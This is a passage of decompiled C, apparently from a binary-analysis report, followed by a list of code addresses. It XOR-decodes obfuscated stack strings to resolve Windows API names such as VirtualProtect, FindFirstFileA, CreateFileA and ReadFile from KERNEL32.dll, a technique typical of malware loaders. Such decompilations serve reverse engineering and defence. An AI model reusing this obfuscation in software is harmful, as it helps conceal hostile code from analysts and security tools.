					_t844 = _t844 + 0xc;
				}
				_v404 = 0;
				_v400 = 0x52c00cd;
				_v396 = 0x794d09c3;
				_v392 = 0x271221a8;
				_v388 = 0x4b7e4586;
				if(_v404 == 0) {
					_t837 = 0;
					do {
						 *(_t844 + 0xd4 + _t837 * 4) =  *(_t844 + 0xd4 + _t837 * 4) ^ 0x4b7e4586;
						_t837 = _t837 + 1;
					} while (_t837 < 4);
				}
				_v424 = 0;
				_v420 = 0x6e992a5c;
				_v416 = 0x4a87227f;
				_v412 = 0x7f9f2c78;
				_v408 = 0x1aeb3769;
				if(_v424 == 0) {
					_t836 = 0;
					do {
						 *(_t844 + 0xc0 + _t836 * 4) =  *(_t844 + 0xc0 + _t836 * 4) ^ 0x1aeb430a;
						_t836 = _t836 + 1;
					} while (_t836 < 4);
				}
				E6EDA4690(_t840, "VirtualProtect", 0, 0x200);
				_t748 = 0;
				 *0x6edc469c = 0;
				_t845 = _t844 + 0xc;
				_t544 =  &_v420;
				if(_v420 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t544 = _t544 + 1;
						_t748 = _t748 + 1;
					} while ( *_t544 != 0);
				}
				_t749 = _t748 + 1;
				if(_t748 + 1 != 0) {
					E6EDA4B70("VirtualProtect",  &_v420, _t749);
					_t845 = _t845 + 0xc;
				}
				_t750 = 0;
				_t545 =  &_v400;
				if(_v400 != 0) {
					do {
						_t545 = _t545 + 1;
						_t750 = _t750 + 1;
					} while ( *_t545 != 0);
				}
				_t751 = _t750 + 1;
				if(_t750 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v400, _t751);
					_t845 = _t845 + 0xc;
				}
				_v364 = 0;
				_v360 = 0x65f18a6d;
				_v356 = 0x19908363;
				_v352 = 0x47cfab08;
				_v348 = 0x2ba3cf26;
				if(_v364 == 0) {
					_t835 = 0;
					do {
						 *(_t845 + 0xfc + _t835 * 4) =  *(_t845 + 0xfc + _t835 * 4) ^ 0x2ba3cf26;
						_t835 = _t835 + 1;
					} while (_t835 < 4);
				}
				_v384 = 0;
				_v380 = 0x3b74093c;
				_v376 = 0x1e6a011f;
				_v372 = 0x3674051f;
				_v368 = 0x4f06606a;
				if(_v384 == 0) {
					_t834 = 0;
					do {
						_t90 = _t834 * 4; // 0x3b74093c
						 *(_t845 + 0xe8 + _t834 * 4) =  *(_t845 + _t90 + 0xe8) ^ 0x4f06606a;
						_t834 = _t834 + 1;
					} while (_t834 < 4);
				}
				E6EDA4690(_t840, "VirtualQuery", 0, 0x200);
				_t752 = 0;
				 *0x6edc48a0 = 0;
				_t846 = _t845 + 0xc;
				_t549 =  &_v380;
				if(_v380 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t549 = _t549 + 1;
						_t752 = _t752 + 1;
					} while ( *_t549 != 0);
				}
				_t753 = _t752 + 1;
				if(_t752 + 1 != 0) {
					E6EDA4B70("VirtualQuery",  &_v380, _t753);
					_t846 = _t846 + 0xc;
				}
				_t754 = 0;
				_t550 =  &_v360;
				if(_v360 != 0) {
					do {
						_t550 = _t550 + 1;
						_t754 = _t754 + 1;
					} while ( *_t550 != 0);
				}
				_t755 = _t754 + 1;
				if(_t754 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v360, _t755);
					_t846 = _t846 + 0xc;
				}
				_v344 = 0;
				_v340 = 0x75badb8c;
				_v336 = 0x9dbd282;
				_v332 = 0x5784fae9;
				_v328 = 0x3be89ec7;
				if(_v344 == 0) {
					_t833 = 0;
					do {
						 *(_t846 + 0x110 + _t833 * 4) =  *(_t846 + 0x110 + _t833 * 4) ^ 0x3be89ec7;
						_t833 = _t833 + 1;
					} while (_t833 < 4);
				}
				_v608 = 0;
				_v604 = 0x7b06ae9c;
				_v600 = 0x4918a6bf;
				_v596 = 0xf11a2b8;
				if(_v608 == 0) {
					_t832 = 0;
					do {
						 *(_t846 + 8 + _t832 * 4) =  *(_t846 + 8 + _t832 * 4) ^ 0x0f74c7ca;
						_t832 = _t832 + 1;
					} while (_t832 < 3);
				}
				E6EDA4690(_t840, "VirtualFree", 0, 0x200);
				_t756 = 0;
				 *0x6edc4aa4 = 0;
				_t847 = _t846 + 0xc;
				_t554 =  &_v604;
				if(_v604 != 0) {
					do {
						_t554 = _t554 + 1;
						_t756 = _t756 + 1;
					} while ( *_t554 != 0);
				}
				_t757 = _t756 + 1;
				if(_t756 + 1 != 0) {
					E6EDA4B70("VirtualFree",  &_v604, _t757);
					_t847 = _t847 + 0xc;
				}
				_t758 = 0;
				_t555 =  &_v340;
				if(_v340 != 0) {
					do {
						_t555 = _t555 + 1;
						_t758 = _t758 + 1;
					} while ( *_t555 != 0);
				}
				_t759 = _t758 + 1;
				if(_t758 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v340, _t759);
					_t847 = _t847 + 0xc;
				}
				_v304 = 0;
				_v300 = 0xa02ca1c;
				_v296 = 0x7663c312;
				_v292 = 0x283ceb79;
				_v288 = 0x44508f57;
				if(_v304 == 0) {
					_t831 = 0;
					do {
						 *(_t847 + 0x138 + _t831 * 4) =  *(_t847 + 0x138 + _t831 * 4) ^ 0x44508f57;
						_t831 = _t831 + 1;
					} while (_t831 < 4);
				}
				_v324 = 0;
				_v320 = 0x75647f96;
				_v316 = 0x407375a3;
				_v312 = 0x405869a2;
				_v308 = 0x25106ab0;
				if(_v324 == 0) {
					_t830 = 0;
					do {
						 *(_t847 + 0x124 + _t830 * 4) =  *(_t847 + 0x124 + _t830 * 4) ^ 0x25101ad1;
						_t830 = _t830 + 1;
					} while (_t830 < 4);
				}
				E6EDA4690(_t840, "GetProcessHeap", 0, 0x200);
				_t760 = 0;
				 *0x6edc4ca8 = 0;
				_t848 = _t847 + 0xc;
				_t559 =  &_v320;
				if(_v320 != 0) {
					do {
						_t559 = _t559 + 1;
						_t760 = _t760 + 1;
					} while ( *_t559 != 0);
				}
				_t761 = _t760 + 1;
				if(_t760 + 1 != 0) {
					E6EDA4B70("GetProcessHeap",  &_v320, _t761);
					_t848 = _t848 + 0xc;
				}
				_t762 = 0;
				_t560 =  &_v300;
				if(_v300 != 0) {
					do {
						_t560 = _t560 + 1;
						_t762 = _t762 + 1;
					} while ( *_t560 != 0);
				}
				_t763 = _t762 + 1;
				if(_t762 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v300, _t763);
					_t848 = _t848 + 0xc;
				}
				_v284 = 0;
				_v280 = 0x1d58e3a3;
				_v276 = 0x6139eaad;
				_v272 = 0x3f66c2c6;
				_v268 = 0x530aa6e8;
				if(_v284 == 0) {
					_t829 = 0;
					do {
						 *(_t848 + 0x14c + _t829 * 4) =  *(_t848 + 0x14c + _t829 * 4) ^ 0x530aa6e8;
						_t829 = _t829 + 1;
					} while (_t829 < 4);
				}
				_v592 = 0;
				_v588 = 0x7493fd89;
				_v584 = 0x6b9ef480;
				_v580 = 0x4f298a2;
				if(_v592 == 0) {
					_t828 = 0;
					do {
						 *(_t848 + 0x18 + _t828 * 4) =  *(_t848 + 0x18 + _t828 * 4) ^ 0x04f298c1;
						_t828 = _t828 + 1;
					} while (_t828 < 3);
				}
				E6EDA4690(_t840, "HeapAlloc", 0, 0x200);
				_t764 = 0;
				 *0x6edc4eac = 0;
				_t849 = _t848 + 0xc;
				_t564 =  &_v588;
				if(_v588 != 0) {
					do {
						_t564 = _t564 + 1;
						_t764 = _t764 + 1;
					} while ( *_t564 != 0);
				}
				_t765 = _t764 + 1;
				if(_t764 + 1 != 0) {
					E6EDA4B70("HeapAlloc",  &_v588, _t765);
					_t849 = _t849 + 0xc;
				}
				_t766 = 0;
				_t565 =  &_v280;
				if(_v280 != 0) {
					do {
						_t565 = _t565 + 1;
						_t766 = _t766 + 1;
					} while ( *_t565 != 0);
				}
				_t767 = _t766 + 1;
				if(_t766 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v280, _t767);
					_t849 = _t849 + 0xc;
				}
				_v264 = 0;
				_v260 = 0x5295b744;
				_v256 = 0x2ef4be4a;
				_v252 = 0x70ab9621;
				_v248 = 0x1cc7f20f;
				if(_v264 == 0) {
					_t827 = 0;
					do {
						 *(_t849 + 0x160 + _t827 * 4) =  *(_t849 + 0x160 + _t827 * 4) ^ 0x1cc7f20f;
						_t827 = _t827 + 1;
					} while (_t827 < 4);
				}
				_v576 = 0;
				_v572 = 0x1032ac11;
				_v568 = 0x529a00a;
				_v564 = 0x6053c959;
				if(_v576 == 0) {
					_t826 = 0;
					do {
						 *(_t849 + 0x28 + _t826 * 4) =  *(_t849 + 0x28 + _t826 * 4) ^ 0x6053c959;
						_t826 = _t826 + 1;
					} while (_t826 < 3);
				}
				E6EDA4690(_t840, "HeapSize", 0, 0x200);
				_t768 = 0;
				 *0x6edc50b0 = 0;
				_t850 = _t849 + 0xc;
				_t569 =  &_v572;
				if(_v572 != 0) {
					do {
						_t569 = _t569 + 1;
						_t768 = _t768 + 1;
					} while ( *_t569 != 0);
				}
				_t769 = _t768 + 1;
				if(_t768 + 1 != 0) {
					E6EDA4B70("HeapSize",  &_v572, _t769);
					_t850 = _t850 + 0xc;
				}
				_t770 = 0;
				_t570 =  &_v260;
				if(_v260 != 0) {
					do {
						_t570 = _t570 + 1;
						_t770 = _t770 + 1;
					} while ( *_t570 != 0);
				}
				_t771 = _t770 + 1;
				if(_t770 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v260, _t771);
					_t850 = _t850 + 0xc;
				}
				_v244 = 0;
				_v240 = 0x63cec28d;
				_v236 = 0x1fafcb83;
				_v232 = 0x41f0e3e8;
				_v228 = 0x2d9c87c6;
				if(_v244 == 0) {
					_t825 = 0;
					do {
						 *(_t850 + 0x174 + _t825 * 4) =  *(_t850 + 0x174 + _t825 * 4) ^ 0x2d9c87c6;
						_t825 = _t825 + 1;
					} while (_t825 < 4);
				}
				_v560 = 0;
				_v556 = 0x7a85d382;
				_v552 = 0x6f81c48c;
				_v548 = 0xae4b6ca;
				if(_v560 == 0) {
					_t824 = 0;
					do {
						 *(_t850 + 0x38 + _t824 * 4) =  *(_t850 + 0x38 + _t824 * 4) ^ 0x0ae4b6ca;
						_t824 = _t824 + 1;
					} while (_t824 < 3);
				}
				E6EDA4690(_t840, "HeapFree", 0, 0x200);
				_t772 = 0;
				 *0x6edc52b4 = 0;
				_t851 = _t850 + 0xc;
				_t574 =  &_v556;
				if(_v556 != 0) {
					do {
						_t574 = _t574 + 1;
						_t772 = _t772 + 1;
					} while ( *_t574 != 0);
				}
				_t773 = _t772 + 1;
				if(_t772 + 1 != 0) {
					E6EDA4B70("HeapFree",  &_v556, _t773);
					_t851 = _t851 + 0xc;
				}
				_t774 = 0;
				_t575 =  &_v240;
				if(_v240 != 0) {
					do {
						_t575 = _t575 + 1;
						_t774 = _t774 + 1;
					} while ( *_t575 != 0);
				}
				_t775 = _t774 + 1;
				if(_t774 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v240, _t775);
					_t851 = _t851 + 0xc;
				}
				_v224 = 0;
				_v220 = 0x8f0e82d;
				_v216 = 0x7491e123;
				_v212 = 0x2acec948;
				_v208 = 0x46a2ad66;
				if(_v224 == 0) {
					_t823 = 0;
					do {
						 *(_t851 + 0x188 + _t823 * 4) =  *(_t851 + 0x188 + _t823 * 4) ^ 0x46a2ad66;
						_t823 = _t823 + 1;
					} while (_t823 < 4);
				}
				_v544 = 0;
				_v540 = 0xff4bd62;
				_v536 = 0x13d4bd78;
				_v532 = 0x7ff6b746;
				if(_v544 == 0) {
					_t822 = 0;
					do {
						 *(_t851 + 0x48 + _t822 * 4) =  *(_t851 + 0x48 + _t822 * 4) ^ 0x7f95d82a;
						_t822 = _t822 + 1;
					} while (_t822 < 3);
				}
				E6EDA4690(_t840, "HeapReAlloc", 0, 0x200);
				_t776 = 0;
				 *0x6edc54b8 = 0;
				_t852 = _t851 + 0xc;
				_t579 =  &_v540;
				if(_v540 != 0) {
					do {
						_t579 = _t579 + 1;
						_t776 = _t776 + 1;
					} while ( *_t579 != 0);
				}
				_t777 = _t776 + 1;
				if(_t776 + 1 != 0) {
					E6EDA4B70("HeapReAlloc",  &_v540, _t777);
					_t852 = _t852 + 0xc;
				}
				_t778 = 0;
				_t580 =  &_v220;
				if(_v220 != 0) {
					do {
						_t580 = _t580 + 1;
						_t778 = _t778 + 1;
					} while ( *_t580 != 0);
				}
				_t779 = _t778 + 1;
				if(_t778 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v220, _t779);
					_t852 = _t852 + 0xc;
				}
				_v184 = 0;
				_v180 = 0x63e01c4c;
				_v176 = 0x1f811542;
				_v172 = 0x61fe1d29;
				_v168 = 0x2db25907;
				if(_v184 == 0) {
					_t821 = 0;
					do {
						 *(_t852 + 0x1b0 + _t821 * 4) =  *(_t852 + 0x1b0 + _t821 * 4) ^ 0x2db25907;
						_t821 = _t821 + 1;
					} while (_t821 < 4);
				}
				_v204 = 0;
				_v200 = 0x6486acc;
				_v196 = 0x165e66c4;
				_v192 = 0x74a6acc;
				_v188 = 0x622603cb;
				if(_v204 == 0) {
					_t820 = 0;
					do {
						 *(_t852 + 0x19c + _t820 * 4) =  *(_t852 + 0x19c + _t820 * 4) ^ 0x6226038a;
						_t820 = _t820 + 1;
					} while (_t820 < 4);
				}
				E6EDA4690(_t840, "FindNextFileA", 0, 0x200);
				_t780 = 0;
				 *0x6edc56bc = 0;
				_t853 = _t852 + 0xc;
				_t584 =  &_v200;
				if(_v200 != 0) {
					do {
						_t584 = _t584 + 1;
						_t780 = _t780 + 1;
					} while ( *_t584 != 0);
				}
				_t781 = _t780 + 1;
				if(_t780 + 1 != 0) {
					E6EDA4B70("FindNextFileA",  &_v200, _t781);
					_t853 = _t853 + 0xc;
				}
				_t782 = 0;
				_t585 =  &_v180;
				if(_v180 != 0) {
					do {
						_t585 = _t585 + 1;
						_t782 = _t782 + 1;
					} while ( *_t585 != 0);
				}
				_t783 = _t782 + 1;
				if(_t782 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v180, _t783);
					_t853 = _t853 + 0xc;
				}
				_v144 = 0;
				_v140 = 0x6b920dc;
				_v136 = 0x7ad829d2;
				_v132 = 0x4a721b9;
				_v128 = 0x48eb6597;
				if(_v144 == 0) {
					_t819 = 0;
					do {
						 *(_t853 + 0x1d8 + _t819 * 4) =  *(_t853 + 0x1d8 + _t819 * 4) ^ 0x48eb6597;
						_t819 = _t819 + 1;
					} while (_t819 < 4);
				}
				_v164 = 0;
				_v160 = 0x739cb3d7;
				_v156 = 0x6480b3d7;
				_v152 = 0x7b9b9ce5;
				_v148 = 0x17f29bf4;
				if(_v164 == 0) {
					_t818 = 0;
					do {
						 *(_t853 + 0x1c4 + _t818 * 4) =  *(_t853 + 0x1c4 + _t818 * 4) ^ 0x17f2da91;
						_t818 = _t818 + 1;
					} while (_t818 < 4);
				}
				E6EDA4690(_t840, "FindFirstFileA", 0, 0x200);
				_t784 = 0;
				 *0x6edc58c0 = 0;
				_t854 = _t853 + 0xc;
				_t589 =  &_v160;
				if(_v160 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t589 = _t589 + 1;
						_t784 = _t784 + 1;
					} while ( *_t589 != 0);
				}
				_t785 = _t784 + 1;
				if(_t784 + 1 != 0) {
					E6EDA4B70("FindFirstFileA",  &_v160, _t785);
					_t854 = _t854 + 0xc;
				}
				_t786 = 0;
				_t590 =  &_v140;
				if(_v140 != 0) {
					do {
						_t590 = _t590 + 1;
						_t786 = _t786 + 1;
					} while ( *_t590 != 0);
				}
				_t787 = _t786 + 1;
				if(_t786 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v140, _t787);
					_t854 = _t854 + 0xc;
				}
				_v124 = 0;
				_v120 = 0x188a9c6c;
				_v116 = 0x64eb9562;
				_v112 = 0x1a949d09;
				_v108 = 0x56d8d927;
				if(_v124 == 0) {
					_t817 = 0;
					do {
						 *(_t854 + 0x1ec + _t817 * 4) =  *(_t854 + 0x1ec + _t817 * 4) ^ 0x56d8d927;
						_t817 = _t817 + 1;
					} while (_t817 < 4);
				}
				_v528 = 0;
				_v524 = 0x3234f5c7;
				_v520 = 0x2535f0c2;
				_v516 = 0x565a9ce4;
				if(_v528 == 0) {
					_t816 = 0;
					do {
						 *(_t854 + 0x58 + _t816 * 4) =  *(_t854 + 0x58 + _t816 * 4) ^ 0x565a9c81;
						_t816 = _t816 + 1;
					} while (_t816 < 3);
				}
				E6EDA4690(_t840, "FindClose", 0, 0x200);
				_t788 = 0;
				 *0x6edc5ac4 = 0;
				_t855 = _t854 + 0xc;
				_t594 =  &_v524;
				if(_v524 != 0) {
					do {
						_t594 = _t594 + 1;
						_t788 = _t788 + 1;
					} while ( *_t594 != 0);
				}
				_t789 = _t788 + 1;
				if(_t788 + 1 != 0) {
					E6EDA4B70("FindClose",  &_v524, _t789);
					_t855 = _t855 + 0xc;
				}
				_t790 = 0;
				_t595 =  &_v120;
				if(_v120 != 0) {
					do {
						_t595 = _t595 + 1;
						_t790 = _t790 + 1;
					} while ( *_t595 != 0);
				}
				_t791 = _t790 + 1;
				if(_t790 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v120, _t791);
					_t855 = _t855 + 0xc;
				}
				_v104 = 0;
				_v100 = 0x17a3c015;
				_v96 = 0x6bc2c91b;
				_v92 = 0x15bdc170;
				_v88 = 0x59f1855e;
				if(_v104 == 0) {
					_t815 = 0;
					do {
						 *(_t855 + 0x200 + _t815 * 4) =  *(_t855 + 0x200 + _t815 * 4) ^ 0x59f1855e;
						_t815 = _t815 + 1;
					} while (_t815 < 4);
				}
				_v512 = 0;
				_v508 = 0x57fdfd31;
				_v504 = 0x5fdeea06;
				_v500 = 0x36d9ea1e;
				if(_v512 == 0) {
					_t814 = 0;
					do {
						 *(_t855 + 0x68 + _t814 * 4) =  *(_t855 + 0x68 + _t814 * 4) ^ 0x36988f72;
						_t814 = _t814 + 1;
					} while (_t814 < 3);
				}
				E6EDA4690(_t840, "CreateFileA", 0, 0x200);
				_t792 = 0;
				 *0x6edc5cc8 = 0;
				_t856 = _t855 + 0xc;
				_t599 =  &_v508;
				if(_v508 != 0) {
					do {
						_t599 = _t599 + 1;
						_t792 = _t792 + 1;
					} while ( *_t599 != 0);
				}
				_t793 = _t792 + 1;
				if(_t792 + 1 != 0) {
					E6EDA4B70("CreateFileA",  &_v508, _t793);
					_t856 = _t856 + 0xc;
				}
				_t794 = 0;
				_t600 =  &_v100;
				if(_v100 != 0) {
					do {
						_t600 = _t600 + 1;
						_t794 = _t794 + 1;
					} while ( *_t600 != 0);
				}
				_t795 = _t794 + 1;
				if(_t794 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v100, _t795);
					_t856 = _t856 + 0xc;
				}
				_v64 = 0;
				_v60 = 0xf785e6e;
				_v56 = 0x73195760;
				_v52 = 0xd665f0b;
				_v48 = 0x412a1b25;
				if(_v64 == 0) {
					_t813 = 0;
					do {
						 *(_t856 + 0x228 + _t813 * 4) =  *(_t856 + 0x228 + _t813 * 4) ^ 0x412a1b25;
						_t813 = _t813 + 1;
					} while (_t813 < 4);
				}
				_v84 = 0;
				_v80 = 0x391ebb00;
				_v76 = 0x2f0fb23a;
				_v72 = 0xb04b73c;
				_v68 = 0x7f6aac36;
				if(_v84 == 0) {
					_t812 = 0;
					do {
						 *(_t856 + 0x214 + _t812 * 4) =  *(_t856 + 0x214 + _t812 * 4) ^ 0x7f6ade53;
						_t812 = _t812 + 1;
					} while (_t812 < 4);
				}
				E6EDA4690(_t840, "SetFilePointer", 0, 0x200);
				_t796 = 0;
				 *0x6edc5ecc = 0;
				_t857 = _t856 + 0xc;
				_t604 =  &_v80;
				if(_v80 != 0) {
					do {
						_t604 = _t604 + 1;
						_t796 = _t796 + 1;
					} while ( *_t604 != 0);
				}
				_t797 = _t796 + 1;
				if(_t796 + 1 != 0) {
					E6EDA4B70("SetFilePointer",  &_v80, _t797);
					_t857 = _t857 + 0xc;
				}
				_t798 = 0;
				_t605 =  &_v60;
				if(_v60 != 0) {
					do {
						_t605 = _t605 + 1;
						_t798 = _t798 + 1;
					} while ( *_t605 != 0);
				}
				_t799 = _t798 + 1;
				if(_t798 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v60, _t799);
					_t857 = _t857 + 0xc;
				}
				_v44 = 0;
				_v40 = 0x2de5aa9d;
				_v36 = 0x5184a393;
				_v32 = 0x2ffbabf8;
				_v28 = 0x63b7efd6;
				if(_v44 == 0) {
					_t811 = 0;
					do {
						 *(_t857 + 0x23c + _t811 * 4) =  *(_t857 + 0x23c + _t811 * 4) ^ 0x63b7efd6;
						_t811 = _t811 + 1;
					} while (_t811 < 4);
				}
				_v496 = 0;
				_v492 = 0x573d7f71;
				_v488 = 0x56307365;
				_v484 = 0x335c1a23;
				if(_v496 == 0) {
					_t810 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t857 + 0x78 + _t810 * 4) =  *(_t857 + 0x78 + _t810 * 4) ^ 0x335c1a23;
						_t810 = _t810 + 1;
					} while (_t810 < 3);
				}
				E6EDA4690(_t840, "ReadFile", 0, 0x200);
				_t800 = 0;
				 *0x6edc60d0 = 0;
				_t858 = _t857 + 0xc;
				_t609 =  &_v492;
				if(_v492 != 0) {
					do {
						_t609 = _t609 + 1;
						_t800 = _t800 + 1;
					} while ( *_t609 != 0);
				}
				_t801 = _t800 + 1;
				if(_t800 + 1 != 0) {
					E6EDA4B70("ReadFile",  &_v492, _t801);
					_t858 = _t858 + 0xc;
				}
				_t802 = 0;
				_t610 =  &_v40;
				if(_v40 != 0) {
					do {
						_t610 = _t610 + 1;
						_t802 = _t802 + 1;
					} while ( *_t610 != 0);
				}
				_t803 = _t802 + 1;
				if(_t802 + 1 != 0) {
					E6EDA4B70("KERNEL32.DLL",  &_v40, _t803);
					_t858 = _t858 + 0xc;
				}
				_v24 = 0;
				_v20 = 0x2731c355;
				_v16 = 0x5b50ca5b;
				_v12 = 0x252fc230;
				_v8 = 0x6963861e;
				if(_v24 == 0) {
					_t809 = 0;
					do {
						 *(_t858 + 0x250 + _t809 * 4) =  *(_t858 + 0x250 + _t809 * 4) ^ 0x6963861e;
						_t809 = _t809 + 1;
					} while (_t809 < 4);
				}
				_v480 = 0;
				_v476 = 0x338da6d8;
				_v472 = 0x2e8382fe;
				_v468 = 0x4087a6ff;
				if(_v480 == 0) {
					_t808 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t858 + 0x88 + _t808 * 4) =  *(_t858 + 0x88 + _t808 * 4) ^ 0x40e2ca9b;
						_t808 = _t808 + 1;
					} while (_t808 < 3);
				}
				E6EDA4690(_t840, "CloseHandle", 0, 0x200);
				_t804 = 0;
				 *0x6edc62d4 = 0;
				_t859 = _t858 + 0xc;
				_t614 =  &_v476;
				if(_v476 != 0) {
					do {
						_t614 = _t614 + 1;
						_t804 = _t804 + 1;
					} while ( *_t614 != 0);
				}
				_t805 = _t804 + 1;
				if(_t804 + 1 != 0) {
					E6EDA4B70("CloseHandle",  &_v476, _t805);
					_t859 = _t859 + 0xc;
				}
				_t806 = 0;
				_t615 =  &_v20;
				if(_v20 != 0) {
					do {
						_t615 = _t615 + 1;
						_t806 = _t806 + 1;
					} while ( *_t615 != 0);
				}
				_t807 = _t806 + 1;
				if(_t806 + 1 != 0) {
					return E6EDA4B70("KERNEL32.DLL",  &_v20, _t807);
				}
				return _t615;
			}

0x6eda1000
0x6eda1006
0x6eda100c
0x6eda1014
0x6eda101f
0x6eda102a
0x6eda1035
0x6eda104f
0x6eda1051
0x6eda1053
0x6eda105f
0x6eda1066
0x6eda1067
0x6eda1053
0x6eda106c
0x6eda1074
0x6eda107f
0x6eda108a
0x6eda1095
0x6eda10af
0x6eda10b1
0x6eda10b3
0x6eda10bf
0x6eda10c6
0x6eda10c7
0x6eda10b3
0x6eda10d8
0x6eda10dd
0x6eda10df
0x6eda10e9
0x6eda10ec
0x6eda10fa
0x6eda1100
0x6eda1100
0x6eda1103
0x6eda1104
0x6eda1100
0x6eda1109
0x6eda110c
0x6eda111c
0x6eda1121
0x6eda1121
0x6eda1124
0x6eda1126
0x6eda1134
0x6eda1136
0x6eda1136
0x6eda1139
0x6eda113a
0x6eda1136
0x6eda113f
0x6eda1142
0x6eda1152
0x6eda1157
0x6eda1157
0x6eda115a
0x6eda1162
0x6eda116d
0x6eda1178
0x6eda1183
0x6eda119d
0x6eda119f
0x6eda11a1
0x6eda11ad
0x6eda11b4
0x6eda11b5
0x6eda11a1
0x6eda11ba
0x6eda11c2
0x6eda11cd
0x6eda11d8
0x6eda11e3
0x6eda11fd
0x6eda11ff
0x6eda1201
0x6eda120d
0x6eda1214
0x6eda1215
0x6eda1201
0x6eda1226
0x6eda122b
0x6eda122d
0x6eda1237
0x6eda123a
0x6eda1248
0x6eda124a
0x6eda1250
0x6eda1250
0x6eda1253
0x6eda1254
0x6eda1250
0x6eda1259
0x6eda125c
0x6eda126c
0x6eda1271
0x6eda1271
0x6eda1274
0x6eda1276
0x6eda1284
0x6eda1286
0x6eda1286
0x6eda1289
0x6eda128a
0x6eda1286
0x6eda128f
0x6eda1292
0x6eda12a2
0x6eda12a7
0x6eda12a7
0x6eda12aa
0x6eda12b2
0x6eda12bd
0x6eda12c8
0x6eda12d3
0x6eda12ed
0x6eda12ef
0x6eda12f1
0x6eda12fd
0x6eda1304
0x6eda1305
0x6eda12f1
0x6eda130a
0x6eda1312
0x6eda131d
0x6eda1328
0x6eda1333
0x6eda134d
0x6eda134f
0x6eda1351
0x6eda1351
0x6eda135d
0x6eda1364
0x6eda1365
0x6eda1351
0x6eda1376
0x6eda137b
0x6eda137d
0x6eda1387
0x6eda138a
0x6eda1398
0x6eda139a
0x6eda13a0
0x6eda13a0
0x6eda13a3
0x6eda13a4
0x6eda13a0
0x6eda13a9
0x6eda13ac
0x6eda13bc
0x6eda13c1
0x6eda13c1
0x6eda13c4
0x6eda13c6
0x6eda13d4
0x6eda13d6
0x6eda13d6
0x6eda13d9
0x6eda13da
0x6eda13d6
0x6eda13df
0x6eda13e2
0x6eda13f2
0x6eda13f7
0x6eda13f7
0x6eda13fa
0x6eda1402
0x6eda140d
0x6eda1418
0x6eda1423
0x6eda143d
0x6eda143f
0x6eda1441
0x6eda144d
0x6eda1454
0x6eda1455
0x6eda1441
0x6eda145a
0x6eda145f
0x6eda1467
0x6eda146f
0x6eda1480
0x6eda1482
0x6eda1490
0x6eda1499
0x6eda149d
0x6eda149e
0x6eda1490
0x6eda14af
0x6eda14b4
0x6eda14b6
0x6eda14c0
0x6eda14c3
0x6eda14cb
0x6eda14d0
0x6eda14d0
0x6eda14d3
0x6eda14d4
0x6eda14d0
0x6eda14d9
0x6eda14dc
0x6eda14e9
0x6eda14ee
0x6eda14ee
0x6eda14f1
0x6eda14f3
0x6eda1501
0x6eda1503
0x6eda1503
0x6eda1506
0x6eda1507
0x6eda1503
0x6eda150c
0x6eda150f
0x6eda151f
0x6eda1524
0x6eda1524
0x6eda1527
0x6eda152f
0x6eda153a
0x6eda1545
0x6eda1550
0x6eda156a
0x6eda156c
0x6eda1570
0x6eda157c
0x6eda1583
0x6eda1584
0x6eda1570
0x6eda1589
0x6eda1591
0x6eda159c
0x6eda15a7
0x6eda15b2
0x6eda15cc
0x6eda15ce
0x6eda15d0
0x6eda15dc
0x6eda15e3
0x6eda15e4
0x6eda15d0
0x6eda15f5
0x6eda15fa
0x6eda15fc
0x6eda1606
0x6eda1609
0x6eda1617
0x6eda1620
0x6eda1620
0x6eda1623
0x6eda1624
0x6eda1620
0x6eda1629
0x6eda162c
0x6eda163c
0x6eda1641
0x6eda1641
0x6eda1644
0x6eda1646
0x6eda1654
0x6eda1656
0x6eda1656
0x6eda1659
0x6eda165a
0x6eda1656
0x6eda165f
0x6eda1662
0x6eda1672
0x6eda1677
0x6eda1677
0x6eda167a
0x6eda1682
0x6eda168d
0x6eda1698
0x6eda16a3
0x6eda16bd
0x6eda16bf
0x6eda16c1
0x6eda16cd
0x6eda16d4
0x6eda16d5
0x6eda16c1
0x6eda16da
0x6eda16df
0x6eda16e7
0x6eda16ef
0x6eda1700
0x6eda1702
0x6eda1710
0x6eda1719
0x6eda171d
0x6eda171e
0x6eda1710
0x6eda172f
0x6eda1734
0x6eda1736
0x6eda1740
0x6eda1743
0x6eda174b
0x6eda1750
0x6eda1750
0x6eda1753
0x6eda1754
0x6eda1750
0x6eda1759
0x6eda175c
0x6eda1769
0x6eda176e
0x6eda176e
0x6eda1771
0x6eda1773
0x6eda1781
0x6eda1783
0x6eda1783
0x6eda1786
0x6eda1787
0x6eda1783
0x6eda178c
0x6eda178f
0x6eda179f
0x6eda17a4
0x6eda17a4
0x6eda17a7
0x6eda17af
0x6eda17ba
0x6eda17c5
0x6eda17d0
0x6eda17ea
0x6eda17ec
0x6eda17f0
0x6eda17fc
0x6eda1803
0x6eda1804
0x6eda17f0
0x6eda1809
0x6eda180e
0x6eda1816
0x6eda181e
0x6eda182f
0x6eda1831
0x6eda1833
0x6eda183c
0x6eda1840
0x6eda1841
0x6eda1833
0x6eda1852
0x6eda1857
0x6eda1859
0x6eda1863
0x6eda1866
0x6eda186e
0x6eda1870
0x6eda1870
0x6eda1873
0x6eda1874
0x6eda1870
0x6eda1879
0x6eda187c
0x6eda1889
0x6eda188e
0x6eda188e
0x6eda1891
0x6eda1893
0x6eda18a1
0x6eda18a3
0x6eda18a3
0x6eda18a6
0x6eda18a7
0x6eda18a3
0x6eda18ac
0x6eda18af
0x6eda18bf
0x6eda18c4
0x6eda18c4
0x6eda18c7
0x6eda18cf
0x6eda18da
0x6eda18e5
0x6eda18f0
0x6eda190a
